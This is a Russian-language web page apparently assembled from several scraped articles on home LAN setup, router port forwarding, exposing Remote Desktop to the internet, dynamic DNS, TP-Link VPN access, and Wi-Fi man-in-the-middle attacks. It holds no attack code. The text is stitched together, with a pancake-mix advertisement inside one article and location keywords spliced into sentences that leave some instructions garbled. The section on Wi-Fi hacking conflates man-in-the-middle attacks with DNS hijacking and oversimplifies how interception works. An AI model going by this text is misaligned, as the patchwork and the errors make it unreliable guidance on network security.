В большинстве маршрутизаторов может определить, какой исходный IP-адрес или исходная сеть может использовать сопоставление портов. Поэтому, если известно, что вы собираетесь подключаться только с работы, можно добавить IP-адрес для своей рабочей сети. Это позволит избежать открытия порта для всего Интернета. Если на узле, которые вы используете для подключения, используется динамический IP-адрес, задайте ограничение источника, чтобы разрешить доступ из целого диапазона адресов, определенного поставщиком услуг Интернета.

Также рассмотрите возможность настройки статического IP-адреса на своем компьютере, чтобы внутренний IP-адрес не менялся. Если это сделать, то перенаправление портов маршрутизатора всегда будет указывать на правильный IP-адрес.

Использование VPN

При подключении к локальной сети с помощью виртуальной частной сети (VPN) не нужно открывать доступ к компьютеру из общедоступного Интернета. Вместо этого при подключении к VPN клиент удаленного рабочего стола действует так, будто он является частью той же сети и имеет доступ к компьютеру. Существует несколько служб VPN — можно найти и использовать ту, которая лучше всего подходит для вас.

Локальная сеть через роутер — как создать дома — Altclick

Объединение нескольких компьютеров и гаджетов в единую локальную сеть позволяет пользователям обмениваться информацией, играть в игры и организовывать доступ в интернет

Содержание

Объединение нескольких компьютеров и гаджетов в единую локальную сеть позволяет пользователям обмениваться информацией, играть в игры и организовывать доступ в интернет в Талдомском районе Московской области для всех входящих в такую сеть устройств. Но для того чтобы сполна использовать возможности локальных сетей, стоит изучить общие принципы их построения и ознакомиться с особенностями их настройки для разных конфигураций. Поэтому стоит выяснить, как построить сеть дома с беспроводным роутером и без него.

Локальная сеть для двух компьютеров

Для такой сети необходимо два компьютера подключить через один маршрутизатор к единому интернет-пространству от провайдеров. С целью повышения безопасности домашней локальной сети на нее стоит установить пароль. Подключение обоих компьютеров может быть произведено как через кабель, так и по Wi-Fi. Последний вариант пользуется наибольшей популярностью у пользователей.

Для настройки системы ПК необходимо выполнить такие действия:

  1. Проверить подключение к одной группе. Нажать Win+R и с появившейся строке ввести sysdm.cpl. В открывшемся окне выбрать рабочую группу. Оба персональных компьютера должны иметь одинаковое название этого пункта. При изменении названия группы операция должна быть проделана на обоих устройствах.
  2. Зайти в панель управления и открыть раздел с параметрами общего доступа.
  3. Выбрать раздел с настройками текущего профиля и зайти в него для внесения правок.
  4. В предоставленном окне сделать активными все предложенные параметры, которые требуют включения.
  5. При активации парольной защиты потребуется вводить код доступа к локальной сети. Для общего доступа такой параметр отключают.

Выполнить перезагрузку системы, проверить правильность подключения компьютеров к одной домашней группе.

Какие бывают домашние сети

Рассмотрим разные способы соединения локальных устройств в единую сеть.


Проводная сеть

В этом случае для соединения отдельных устройств используют витую пару.

Без использования дополнительных устройств пользователь столкнется с такими недостатками:

  • общий доступ к глобальной сети без дополнительной сетевой карты будет невозможен;
  • возможно подключение только двух компьютеров.

Применение свитча или роутера в такой локальной сети, дает ей следующие преимущества:

При использовании коммутатора все устройства пользователю придется настраивать поочередно.

Для расширения возможностей проводной локальной сети пользователю следует знать, как подключить подсеть через роутер. Для этого маршрутизаторы соединяют по принципу LAN-to-WAN. После этого на ведомом маршрутизаторе можно создать сеть второго уровня.

Беспроводная сеть

В этом случае роль основного соединителя играет маршрутизатор. Создание локальной сети через роутер позволяет использовать беспроводной интерфейс во время передачи информации.

Среди преимуществ такого способа организации сетевой инфраструктуры:

  • легкость корректировки параметров работы;
  • возможность подключения нескольких персональных компьютеров;
  • объединение в одну сеть ПК, планшетов, ноутбуков, смартфонов, смарт-часов, элементов умного дома и других беспроводных устройств.

Для создания такой сети можно использовать современные роутеры Keenetic, TP-Link, Асус и другие маршрутизаторы, имеющие беспроводной Wi-Fi модуль и набор LAN-портов.

Варианты построения домашней локальной сети

Главное условие организации домашней локальной сети заключается в соединении компьютеров с роутером с помощью правильно обжатой витой пары. Также необходимо правильно настроить все сетевые параметры на роутере и каждом из компьютеров.

Конфигурация параметров работы включает такие действия:

  1. Зайти в панель управления устройством через меню Пуск.
  2. Открыть раздел с параметрами сетевых подключений.
  3. Выбрать нужное соединение и дождаться появления нового окна. Выбрать строку с информацией о состоянии соединения, открыть его свойства.
  4. Выбрать протокол TCP/ipV4, открыть его свойства.
  5. Активировать пункт «Использовать следующий IP» путем перемещения ползунка. Указать вручную маску подсети с IP адресом компьютера.

Остальные параметры не подлежат изменению. Пользователю нужно сохранить новые настройки с помощью кнопки. При настройке безопасности соединения рекомендовано выбирать варианты, предложенные производителем.

Для систем Windows от компании Microsoft характерны 3 варианта настроек безопасности:

  1. Домашняя. Подключенные устройства принимают участие в организации сетки. Обязательно активируют функции сетевого окружения. Это позволит получить доступ к данным на всех устройства, в рамках одной локальной сети.
  2. Рабочая. Оптимальное решение для малых офисов. Принцип работы схож с домашним вариантом. Активируется сетевое окружение, а также открывается общий доступ к информации и всем устройствам.
  3. Публичная. Стандартный вариант для общественных мест. Такой уровень безопасности по умолчанию скрывает доступ к подключенным устройствам.

После конфигурации параметров нужно проверить все устройства на подключение к одной сети. Следует убедиться в отсутствии повторяющихся IP-адресов в рамках одной сети. Также стоит проследить, чтобы каждый компьютер имел уникальное отображаемое в сети имя. Задать сетевое имя для каждого из ПК можно из «Моего компьютера», зайдя в «Свойства» и найдя в них пункт «Имя компьютера, имя домена и параметры рабочей группы».

Правильно настроенная локальная сеть через роутер позволит каждому из подключенных устройств получать доступ к информации, хранящейся на остальных участниках сети. Для того чтобы сполна пользоваться этой возможностью, нужно правильно настроить параметры безопасности и общего доступа.

Доступ к папкам и файлам

Получить разрешение на просмотр папок и файлов можно так:

  1. Открыть «Мой компьютер».
  2. Перейти в раздел с параметрами сети.
  3. Кликнуть правой кнопкой по папке и открыть ее свойства.
  4. Выбрать раздел с параметрами доступа.
  5. Открыть подраздел с расширенными настройками.
  6. Разрешить общий доступ, установив соответствующие флажки для разрешений на чтение и запись.

После этого нужно обязательно сохранить изменения с помощью кнопки «ОК». Если все сделано правильно, пользователи домашней сети получат доступ ко всем данным, хранящимся на ПК.


Отключение пароля

Если вы полностью доверяете всем участникам своей сети, вы можете отключить пароль на доступ к сетевым ресурсам, что позволит компьютерам и пользователям максимально быстро обмениваться необходимой информацией.

Для этого нужно:

  1. Зайти в раздел параметров домашней группы.
  2. Выбрать подраздел «Изменение дополнительных параметров».
  3. Включить нахождение сети с помощью соответствующего значка.
  4. Открыть доступ к папкам путем установки флажка.
  5. Выключить запрос пароля доступа.

Как подключить дополнительную технику к сети

К одной локальной сети можно подключить разные типы компьютерной техники. Рассмотрим особенности подключения компьютеров и смартфонов.

Компьютер

После создания и настройки локалки к ней можно подключать дополнительные ПК. Для подсоединения пользователю нужно проверить активные сети. Для подключения к нужной сети следует нажать на соответствующую строку.

В случае отсутствия такой записи поступают так:

  • заходят в раздел «Общественная сеть»;
  • выполняют переход в нужную сеть.

Теперь нужно правильно подключить устройство:

  1. Открыть раздел, предоставляющий доступ домашним ПК.
  2. Присоединиться к локальной сети с помощью кнопки.
  3. Собрать все необходимые элементы для доступа.
  4. Указать правильный пароль.
  5. Нажать кнопку «Готово».

Эту последовательность действий нужно выполнить на каждом подключаемом ПК.

Смартфон

Для подсоединения телефона к локальной сети нужно дополнительное ПО. Лучше использовать утилиту ES Проводник, которую можно найти в интернете.

После установить интернет на даче в Подмосковье и требуется настроить:

  • перейти в раздел Сеть;
  • нажать кнопку «LAN»;
  • активировать режим сканирования.

Это позволит другим устройствам получить доступ к данным, находящимся на смартфоне, а также предоставит гаджету доступ к внешним сетевым ресурсам.

Возможные проблемы

Во время создания домашней локальной сети пользователь может столкнуться с трудностями. Рассмотрим наиболее частые неполадки и способы их устранения

Не появляются устройства из локальной сети

Для исправления этой проблемы нужно выполнить проверку параметров общего доступа на всех устройствах.

Дополнительно проверяют рабочую группу:

  1. Открывают проводник.
  2. Переходят в раздел с параметрами сети.
  3. Приводят название рабочей группы в соответствие для всех компьютеров, которые должны находиться в одной сети.

Нет доступа к общей папке

Такая ошибка появляется в случае нарушения инструкции настройки доступа. Для исправления этой проблемы нужно заново настроить параметры доступа к общей папке.

Устройства не показаны в локальной сети

Для исправления проблемы необходимо проверить:

  • статус домашней локальной сети;
  • для какого именно профиля подключена сеть.

Повторная настройка этих параметров позволит устранить возникшее затруднение.

Как получить доступ к домашнему серверу за маршрутизатором / брандмауэром

Джина Трапани

Недавние функции Lifehacker охватили, как запустить персональный веб-сервер, как управлять домашним компьютером из любого места и как настроить персональный вики. Для пользователей домашней сети с установленным маршрутизатором домашние серверы недоступны из Интернета из-за встроенного межсетевого экрана многих современных маршрутизаторов.

Сегодня мы расскажем, как открыть определенные порты на вашем маршрутизаторе, чтобы разрешить доступ к домашнему серверу за брандмауэром.

Обратите внимание: это руководство предназначено для опытных пользователей. Брандмауэр вашего маршрутизатора предназначен для защиты от злоумышленников, которые пытаются контролировать ваш компьютер через Интернет. Убедитесь, что любая служба, которую вы предоставляете в Интернете, защищена надежным паролем.

Для разрешения внешнего доступа к внутреннему компьютеру в домашней сети необходимо настроить NAT — «преобразование сетевых адресов» или переадресацию портов. Пересылка отправляет запросы портов за пределами вашего брандмауэра на нужный компьютер внутри.

G / O Media может получить комиссию

Скидка 15%

Смесь для блинов с пахтой

Положите стопку на оладьи
Вы хотите блины, но вы также хотите получить выигрыш — что, черт возьми, вы можете сделать? Засунь немного протеина в эти оладьи, друг мой! И прямо сейчас вы можете сделать это с минимальными усилиями и максимальным раздуванием с этой эксклюзивной скидкой 15% на смесь для блинов из пахты и протеина от Flourish!

Например, кто-то извне запрашивает страницу с веб-сервера на IP-адрес вашего маршрутизатора.Если настроена переадресация портов, ваш маршрутизатор знает, что нужно пересылать запросы на порт 80 (порт по умолчанию веб-сервера) на компьютер, на котором работает только веб-сервер — и ни один из других в вашей сети.

Переадресация портов необходима только в том случае, если вы хотите предоставить услугу компьютерам в Интернете за пределами вашего брандмауэра. Некоторые серверы, с которыми вы хотели бы сделать это:

  • домашний веб-сервер
  • персональный wiki
  • BitTorrent-клиент загружает, а также загружает
  • VNC-сервер
  • домашний FTP-сервер

Хотя все маршрутизаторы немного отличаются, переадресация портов довольно проста.Вот как его настроить:

Шаг 1. Определите внутренний IP-адрес вашего сервера.

Все компьютеры во внутренней сети имеют IP-адрес, который выглядит примерно как 192.168.0.XXX. Войдите в компьютер с запущенным сервером и откройте командное окно. Затем введите ipconfig , чтобы определить внутренний адрес машины, например:

 C: \ Gina> ipconfig Windows IP Configuration Ethernet-адаптер Подключение по локальной сети: DNS-суффикс для конкретного подключения.:         Айпи адрес. . . . . . . . . . . . : 192.168.0.11 Маска подсети. . . . . . . . . . . : 255.255.255.0 Шлюз по умолчанию. . . . . . . . . : 192.168.0.1 

В этом случае, как видите, внутренний IP-адрес сервера 192.168.0.11.

Шаг 2. Настройте маршрутизатор.

Большинство маршрутизаторов имеют административный веб-интерфейс, расположенный по адресу http://192.168.0.1. (Этот адрес зависит от вашей модели. Дополнительную информацию см. В руководстве пользователя маршрутизатора.)

После того, как вы зашли в администрацию роутера, ввели пароль (если он настроен), должна появиться область под названием «Переадресация портов». Здесь вы установите номер порта, на который будут поступать запросы из Интернета, и внутренний компьютер, который должен выполнять эти запросы. Вот снимок экрана моего маршрутизатора Netgear, настроенного для перенаправления порта 5900 на мой сервер VNC, который находится по адресу 192.168.0.11 (см. Выше). Кликните на картинку чтобы открыть ее в полный размер.

Вот таблица общих служб и их номеров портов по умолчанию.

Служба Номер порта
Веб-сервер 80
VNC (удаленное управление) 5900
Instiki wiki 2500
FTP 21
BitTorrent 6881-6990

Какие-либо другие службы, которые вы переносите на переадресацию, для которых я пропустил? Добавьте его в комментарии к статье или напишите мне в советах на лайфхакере.com.

Джина Трапани — редактор Lifehacker. Ее специальная статья Geek to Live появляется каждую среду и пятницу на Lifehacker.

Настройка маршрутизатора для приема подключений к настольному компьютеру — База знаний

Настройка маршрутизатора для доступа к RDS


Если ваш компьютер не подключен напрямую к интернет-модему и работает через проводной или беспроводной маршрутизатор, вы должны настроить маршрутизатор для подключения к удаленному рабочему столу через Интернет.Эта конфигурация позволяет вашему маршрутизатору знать, куда направлять подключения к удаленному рабочему столу, исходящие из Интернета.

Настройка маршрутизатора заключается в его настройке на пересылку данных, поступающих на определенные порты, на компьютер, который вы настроили с помощью подключения к удаленному рабочему столу. TCP-порт 3389 (который использует удаленный рабочий стол) должен быть перенаправлен на удаленный рабочий стол ПК / сервер. Если вы настраиваете веб-доступ, вы также должны перенаправить TCP-порт 80 (или порт, отличный от порта по умолчанию, который вы установили) на хост-компьютер.

Если вы точно не знаете, как настроить переадресацию этих портов, следующие шаги должны помочь:

  1. Для доступа к веб-утилите настройки маршрутизатора откройте веб-браузер , введите IP-адрес маршрутизатора и нажмите Enter. Если вы не знаете IP-адрес, см. Документацию к маршрутизатору или укажите значение шлюза по умолчанию, указанное в сведениях о состоянии подключения Windows.
  2. При появлении запроса введите имя пользователя и пароль вашего маршрутизатора.Вы должны были установить эти учетные данные при настройке маршрутизатора; однако в противном случае вы можете указать значения по умолчанию в документации маршрутизатора.
  3. Найдите вкладку «Виртуальный сервер » или «Перенаправление портов » на экранах администрирования маршрутизатора.
  4. Введите данные порта , для каждого порта, который необходимо перенаправить (обсуждалось в предыдущих параграфах), вводя информацию в соответствующие текстовые поля или выбирая параметры из списков. Рисунок 3 предлагает пример.Возможно, вам придется ввести имя для справки, например, удаленный рабочий стол или веб-доступ к удаленному рабочему столу. Иногда вы можете выбрать компьютер (идентифицируемый по имени компьютера), на который хотите выполнить переадресацию, из раскрывающегося списка меню, или вам, возможно, придется ввести IP-адрес компьютера. Вы можете узнать IP-адрес своего компьютера, обратившись к сведениям о состоянии подключения в Windows. Наконец, вам, вероятно, придется ввести порт, который вы хотите перенаправить, который был ранее предоставлен как для удаленного рабочего стола, так и для доступа в Интернет.
  5. Нажмите кнопку Сохранить или Применить .

Теперь вы должны убедиться, что порт (ы) всегда перенаправляются на правильный компьютер. Если вы используете динамические IP-адреса в своей локальной сети (это метод по умолчанию), то есть они автоматически назначаются вашим компьютерам с помощью DHCP-сервера маршрутизатора, вам необходимо выполнить некоторую дополнительную настройку. Вы должны назначить статический IP-адрес хотя бы компьютеру, на котором будет размещено подключение к удаленному рабочему столу.Это связано с тем, что IP-адрес, который вы только что настроили для перенаправления портов, когда-нибудь будет передан другому компьютеру или станет неиспользованным, если он будет назначен автоматически.

У вас есть два способа предоставить вашему компьютеру постоянный IP-адрес. Вы можете зарезервировать IP-адрес для компьютера в утилите настройки маршрутизатора, если ваш маршрутизатор его поддерживает. Это предпочтительно, так как вам не нужно менять фактические настройки вашего компьютера, а подключение к другим сетям будет намного проще.Однако, если эта функция недоступна, вы всегда можете вручную назначить своему компьютеру (сетевому адаптеру) статический IP-адрес в Windows.

Другие полезные статьи

http://helpdeskgeek.com/networking/configure-router-for-remote-desktop/

Как настроить удаленный рабочий стол через маршрутизатор

Если вы хотите подключиться к компьютеру с Windows удаленно, есть несколько способов сделать это. Например, вы можете туннелировать VNC через SSH, позволяя использовать протокол VNC с открытым исходным кодом через зашифрованное соединение SSH.Однако лучший способ — использовать инструмент удаленного рабочего стола Windows.

Перед тем, как вы будете готовы к удаленному подключению к ПК с Windows, вам необходимо выполнить некоторые действия. Вам нужно будет настроить удаленный рабочий стол через маршрутизатор, убедившись, что необходимые порты открыты и что переадресация портов активна. Чтобы сделать это и использовать удаленный рабочий стол удаленно, вам необходимо выполнить следующие действия.

Настройка брандмауэра Windows для разрешения доступа к удаленному рабочему столу

Прежде чем вы сможете настроить подключения к удаленному рабочему столу через маршрутизатор, вам необходимо убедиться, что Windows разрешает входящие и исходящие подключения к вашему компьютеру.

  1. Для этого щелкните правой кнопкой мыши меню «Пуск» и выберите Параметры .
  1. В меню Настройки выберите Обновление и безопасность > Безопасность Windows > Брандмауэр и защита сети .
  1. В меню Брандмауэр и защита сети выберите Разрешить приложение через брандмауэр .
  1. Нажмите кнопку Изменить настройки в окне Разрешенные приложения , чтобы разблокировать меню.
  1. После того, как вы разблокируете это меню, найдите в представленном списке параметры Remote Desktop и Remote Desktop (WebSocket) . Установите флажки рядом с этими параметрами, чтобы разрешить RDP-подключения через брандмауэр. Нажмите кнопку OK , чтобы сохранить свой выбор.

Изменение порта RDP по умолчанию в Windows 10

Вы настроили брандмауэр Windows для разрешения подключений RDP (протокол удаленного рабочего стола).Теперь вы должны изменить порт RDP по умолчанию, используемый Windows для подключений RDP, с порта 3389 на альтернативный номер порта.

Это связано с тем, что риск атак протокола удаленного рабочего стола чрезвычайно высок. Хотя смена портов — не единственный способ защитить ваши RDP-соединения, это поможет замедлить и ограничить риски от случайных ботов, сканирующих порты, которые ищут открытые порты RDP на вашем маршрутизаторе.

  1. Чтобы изменить порт RDP, щелкните правой кнопкой мыши меню «Пуск» и выберите « Выполнить ».Либо нажмите клавишу Windows + R на клавиатуре.
  1. В диалоговом окне Выполнить введите regedit перед тем, как выбрать OK . Это откроет редактор реестра Windows.
  1. Используя древовидное меню слева в новом окне редактора реестра, найдите ключ HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp \ PortNumber . Щелкните правой кнопкой мыши на кнопке PortNumber справа и выберите опцию Modify .
  1. В поле Edit DWORD (32-bit) Value выберите Decimal из категории Base , затем установите новое значение порта в поле Value data , убедившись, что используемое значение не соответствует t обычно используется любыми другими известными портами. Выберите OK , чтобы сохранить свой выбор.

После того, как вы внесете изменения в номер порта RDP по умолчанию, вам необходимо перезагрузить компьютер. Любые соединения, которые вы делаете с вашим ПК с помощью RDP, должны быть настроены с использованием номера порта, который вы выбрали (например, 10.0.0.10:1337 , а не 10.0.0.10:3389 ).

Включение переадресации портов на сетевом маршрутизаторе

Теперь вы можете приступить к настройке маршрутизатора, чтобы разрешить подключение из Интернета к компьютеру в локальной сети. Первый шаг в этом процессе — включить переадресацию портов на вашем маршрутизаторе, не допуская хакеров.

  1. Для начала зайдите на страницу веб-администрирования вашего маршрутизатора с помощью веб-браузера (обычно 192.168.1.1, 192.168.1.254 или аналогичный вариант) и войдите в систему. Вам необходимо убедиться, что устройство, которое вы используете для доступа к веб-порталу, подключено к той же сети. Если вы не уверены, обратитесь к руководству пользователя вашего сетевого маршрутизатора за дополнительной информацией.
  1. После того, как вы вошли в свой маршрутизатор, вам нужно будет найти настройки переадресации портов (например, Forwarding > Virtual Servers на маршрутизаторе TP-Link). После того, как вы найдете эти настройки, вам нужно будет добавить запись, которая сопоставляет порт RDP (3389 по умолчанию или настроенный вами порт) с IP-адресом локальной сети вашего ПК (а не с вашим общедоступным IP-адресом. ).

При отображении порта RDP переадресация портов должна быть активна и готова к разрешению подключений к удаленному рабочему столу через Интернет. Вы должны иметь возможность удаленно подключаться к своему ПК, используя свой общедоступный IP-адрес и номер порта RDP, при этом ваш сетевой маршрутизатор перенаправляет запросы на ваш компьютер.

Сопоставление вашего IP-адреса с помощью службы динамического DNS

Когда переадресация портов активна, вы сможете устанавливать подключения к удаленному рабочему столу через Интернет, пока активно правило переадресации портов, ваш компьютер включен и подключен к маршрутизатору, ваше интернет-соединение активно и ваш общедоступный IP-адрес адрес остается прежним.

Однако, если ваш интернет-провайдер использует динамические IP-адреса (IP-адреса, которые регулярно меняются), вы не сможете подключиться, если или когда ваш общедоступный IP-адрес изменится. Чтобы обойти эту проблему, вы можете сопоставить свой IP-адрес с помощью службы динамического DNS, чтобы при изменении вашего IP-адреса вы по-прежнему могли устанавливать соединения удаленно.

Однако, прежде чем вы сможете использовать службу динамического DNS, вам необходимо создать учетную запись у подходящего провайдера, например No-IP.

  1. Если вы хотите использовать No-IP для динамического DNS, создайте учетную запись, указав свой адрес электронной почты и подходящий пароль.Вам также потребуется указать имя хоста (например, example.ddns.net), которое вы можете использовать для установления RDP-соединений без использования вашего IP-адреса.
  1. После создания учетной записи ее необходимо активировать. Проверьте свой почтовый ящик и нажмите кнопку Подтвердить учетную запись , которая будет включена в электронное письмо с подтверждением, как только вы его получите.
  1. После активации учетной записи вам нужно будет установить клиент динамического обновления на свой компьютер.Это гарантирует, что ваша учетная запись без IP-адреса всегда будет иметь правильный общедоступный IP-адрес, что позволит вам устанавливать соединения. Загрузите клиент динамического обновления на свой компьютер и установите его, чтобы продолжить.
  1. После установки клиента динамического обновления на ваш компьютер приложение должно открыться автоматически. На этом этапе войдите в систему, используя свое имя пользователя и пароль без IP.
  1. После входа в систему вам нужно будет выбрать имена хостов для привязки к вашему общедоступному IP-адресу. Выберите соответствующее имя хоста из списка, затем выберите Сохранить для подтверждения.
  1. На этом этапе у вас должна быть возможность удаленно подключиться к компьютеру, используя имя хоста Dynamic DNS и используемый порт RDP (например, example.ddns.net:3389 ). Клиент динамического обновления будет проверять изменения вашего общедоступного IP-адреса каждые пять минут, но если вы хотите обновить его самостоятельно, нажмите кнопку Обновить сейчас в окне настроек DUC.
  1. Некоторые сетевые маршрутизаторы (например, TP-Link) поддерживают динамический DNS и позволяют автоматически обновлять общедоступный IP-адрес без установки клиента динамического обновления на ваш компьютер.Тем не менее, рекомендуется сделать это в качестве резервного варианта. Например, пользователи маршрутизатора TP-Link могут получить доступ к этим настройкам, выбрав пункт меню Dynamic DNS на странице веб-администрирования. Для других моделей обратитесь к руководству пользователя вашего сетевого маршрутизатора для получения дополнительной информации о том, как действовать.
  1. После настройки маршрутизатора с помощью этих шагов вы сможете удаленно подключаться по протоколу RDP. Обязательно введите правильное имя хоста динамического DNS и номер порта (например, example.ddns.net:3387 ) в инструменте подключения к удаленному рабочему столу для правильной проверки подлинности. Если ваш маршрутизатор настроен правильно и нет других проблем с подключением, вы сможете установить подключение и успешно установить подключение к удаленному рабочему столу.

Альтернативы удаленному рабочему столу

Приведенные выше шаги должны позволить вам настроить подключения к удаленному рабочему столу через маршрутизатор. Однако, если ваши подключения к удаленному рабочему столу не работают или вы недовольны качеством, есть альтернативы RDP.Например, такие приложения, как TeamViewer, позволят вам с легкостью подключиться к компьютеру.

Вы также можете использовать различные инструменты управления удаленным рабочим столом для поддержания ваших подключений, или вы можете вместо этого подумать о настройке VPN для установления соединений с вашим удаленным компьютером. Вы также можете подумать, как удаленно выключить или перезагрузить компьютер, чтобы перезагрузить компьютер, если у вас возникнут проблемы.

Простой удаленный доступ к вашему рабочему компьютеру, подключенному к маршрутизатору TP-Link

Простой удаленный доступ к вашему рабочему компьютеру, подключенному к маршрутизатору TP-Link

Работа на дому в последнее время стала реальностью для многих, поскольку COVID-19 (болезнь, вызванная коронавирусом 2019 года) распространилась по всему миру.Если ваш рабочий компьютер подключен к маршрутизатору TP-Link, вы можете настроить удаленный доступ, чтобы продолжить работу с файлами и приложениями на вашем компьютере, принтере и сервере NAS в офисе, а также с ресурсами интрасети, когда вы вдали от офиса.

В этой статье кратко представлены три наиболее часто используемых метода для справки, включая удаленный рабочий стол + виртуальный сервер, OpenVPN и PPTP VPN. Обратите внимание, что изображения могут отличаться в зависимости от операционной системы вашего компьютера, а также от модели маршрутизатора и версии прошивки.Если вам нужны подробные инструкции, обратитесь к соответствующей справочной информации или руководствам пользователя.

Удаленный рабочий стол + виртуальный сервер

Этот метод использует функцию удаленного рабочего стола компьютера и функцию виртуального сервера маршрутизатора. Его легко настроить, но при этом могут возникнуть проблемы с безопасностью, поскольку он предоставляет доступ к офисному серверу напрямую в Интернет.

Этот метод требует, чтобы ваша офисная сеть имела широкополосное соединение с общедоступным IP-адресом.Перед настройкой виртуального сервера рекомендуется настроить службу динамического DNS, например TP-Link DDNS.

Для настройки удаленного доступа:

  1. На офисном маршрутизаторе добавьте сопоставление виртуального сервера для TCP-порта 3389 (порт протокола удаленного рабочего стола).

2. На рабочем компьютере разрешите удаленные подключения.

Для доступа к рабочему компьютеру из дома:

Подключите к домашнему компьютеру рабочий компьютер.

VPN (OpenVPN / PPTP VPN)

При VPN-подключении офисная сеть может действовать как сервер, и ваш домашний компьютер может получить доступ к серверу через маршрутизатор, который действует как шлюз VPN-сервера. Это безопасно, поскольку VPN обеспечивает шифрование как данных, так и каналов управления.

Перед включением VPN-сервера рекомендуется настроить службу динамического DNS, например TP-Link DDNS. Также не забудьте синхронизировать системное время маршрутизатора с Интернетом.

Общие способы установки VPN-соединений включают OpenVPN и PPTP VPN. Вы можете выбрать любой из вариантов в соответствии с вашими потребностями. Если вы используете сервер OpenVPN, вам необходимо установить клиентскую утилиту OpenVPN на каждый домашний компьютер, который вы планируете использовать для доступа к своему рабочему компьютеру.

OpenVPN

Для настройки удаленного доступа:

  1. На офисном маршрутизаторе сгенерируйте сертификат, настройте сервер OpenVPN, а затем экспортируйте файл конфигурации (client.овпн).

2. На рабочем компьютере разрешите удаленные подключения.

Для доступа к рабочему компьютеру из дома:

  1. На домашний компьютер загрузите и установите клиентскую утилиту OpenVPN со страницы http://openvpn.net/index.php/download/community-downloads.html

2. Скопируйте файл конфигурации (client.ovpn), экспортированный из офисного маршрутизатора, в папку «config» клиентской утилиты OpenVPN.Путь зависит от того, где установлена ​​клиентская утилита OpenVPN.

3. Запустите клиентскую утилиту OpenVPN, чтобы подключиться к настроенному серверу OpenVPN.

Подробные инструкции см. В разделе «Как настроить OpenVPN на маршрутизаторах TP-Link (Windows)».

PPTP VPN

Для настройки удаленного доступа:

  1. На офисном маршрутизаторе настройте сервер PPTP и создайте учетные записи подключения PPTP VPN.

2. На рабочем компьютере разрешите удаленные подключения.

Для доступа к рабочему компьютеру из дома:

На домашнем компьютере используйте встроенное в Windows программное обеспечение PPTP или стороннее программное обеспечение PPTP для подключения к серверу PPTP.

Советы для работы на дому

  1. Удаленный доступ через сервер VPN более безопасен, чем удаленный доступ через виртуальный сервер.Рекомендуется настроить сервер OpenVPN или PPTP VPN для обеспечения безопасности данных.
  2. Не выключайте рабочий компьютер, пока вам нужен удаленный доступ. Или настройте Remote Wake-Up для удаленного включения компьютера, если он поддерживается.
  3. Работа с удаленным компьютером может быть медленнее в зависимости от скорости как домашней, так и офисной сети. Если вы используете VPN-соединение, процесс шифрования также замедляет работу.

Может ли кто-нибудь взломать мой компьютер или телефон через Wi-Fi — MacMyths

Каждый день мы видим новости о взломе компьютеров и о том, как киберпреступники зарабатывают деньги на людях, не имеющих представления о защите своих активов.

Для кого-то не очень технического может показаться, что хакеры настолько сильны, и единственный способ спрятаться — это выключить все устройства и полностью отключиться от сети.

Однако правда в том, что есть несколько простых вещей, которые можно сделать, чтобы убедиться, что мы в достаточной безопасности при просмотре Интернета, не влияя на нашу способность получать доступ к необходимой нам информации.

Обычно киберпреступники взламывают маршрутизаторы Wi-Fi, используя атаки Man In The Middle, также известные как DNS Hijacking.В таком сценарии мошеннический компьютер перехватывает трафик между пользовательским компьютером или телефоном и маршрутизатором Wi-Fi и может считывать имена пользователей, пароли, электронные письма и другую конфиденциальную информацию.

Если хакер находится вне зоны действия Wi-Fi, то способ атаки будет другим.

Давайте рассмотрим различные сценарии взлома компьютера и способы защиты ваших устройств.

Взлом компьютера через локальный Wi-Fi

Как вы, наверное, догадались, гораздо проще взломать компьютер, который находится в непосредственной близости от устройства хакера.

Например, ваш сосед может подключиться к вашему Wi-Fi и использовать ваш Интернет бесплатно. Или вы можете подключиться к бесплатному Wi-Fi в кафе или отеле, но кто-то уже взломал сеть, и теперь все, включая вас, являются потенциальной целью.

А может вы пользуетесь офисным WiFi, и он тоже был взломан.

И это необязательно должен быть компьютер, например Mac или ПК. Ваш смартфон, iPhone или Android, которые используют Wi-Fi, также могут быть взломаны.

Давайте посмотрим, что могут сделать хакеры, если они физически подключены к Wi-Fi, который вы используете.

Атака по центру

Если у вас дома есть Интернет от провайдера кабеля, DSL или оптоволокна, у вас есть маршрутизатор. Ваш компьютер не подключается к Интернету напрямую; он отправляет и получает данные, направляя их через маршрутизатор.

С точки зрения непрофессионала, процесс выглядит следующим образом:

  1. Ваш компьютер или телефон обнаруживает маршрутизатор Wi-Fi.
  2. После отправки правильного пароля маршрутизатор отправляет обратно свой MAC-адрес. MAC-адрес — это идентификатор компонентов компьютера, и теоретически он должен быть уникальным для миллиардов устройств на планете.Сетевая карта на вашем компьютере также имеет уникальный MAC-адрес.
  3. После того, как вы получите MAC-адрес маршрутизатора, вся интернет-активность будет проходить через маршрутизатор. На картинке ниже рядом с каждым устройством в локальной сети указан MAC-адрес, а адрес маршрутизатора — 11: 22: 33: 44: 55: 66.

Когда хакер подключается к локальному маршрутизатору WiFi, он также находит MAC-адрес маршрутизатора. Хакер меняет MAC-адрес своего компьютера на такой же, как у маршрутизатора (11: 22: 33: 44: 55: 66 на рисунке ниже).

Теперь все устройства в локальной сети подключаются к машине хакера, а затем данные передаются на маршрутизатор и от него. Таким образом, хакер становится человеком посередине (MITM).

Как только это произошло, хакер может читать все исходящие запросы и входящие данные, используя различные инструменты, которые собирают такие данные.

Это означает, что каждый раз, когда вы вводите имя пользователя и пароль на каком-либо веб-сайте или вводите номер своей кредитной карты, они сохраняются на машине хакера.Кроме того, каждый URL-адрес, который вы посещаете, также сохраняется.

Очевидно, есть некоторые ограничения. Например, если веб-сайт использует протокол HTTPS (S в конце означает «Безопасный»), весь трафик между вашим компьютером шифруется, и киберпреступники не смогут его взломать (в большинстве случаев).

Однако, если веб-сайт использует HTTP, все данные, включая пароль, будут в открытом виде.

Итак, если вы хотите избежать кражи ваших данных, всегда проверяйте, использует ли веб-сайт безопасный протокол (HTTPS).В браузерах безопасный протокол обычно отображается со значком замка рядом с URL-адресом.

Никогда не вводите пароли или финансовую информацию на веб-сайтах с HTTP!

Как взломать роутер

Когда дело доходит до домашнего Wi-Fi, для посторонних есть три способа подключиться к маршрутизатору:

  1. Маршрутизатор не защищен паролем
  2. Вы пароль говорите. Например, вы сказали гостю пароль, или она посмотрела его на маршрутизаторе (если вы не меняли пароль по умолчанию)
  3. Если маршрутизатор использует старый протокол аутентификации

, я пропущу первый два и вместо того, чтобы сосредоточиться на последнем.Протокол аутентификации, используемый с WiFi-роутером, очень важен.

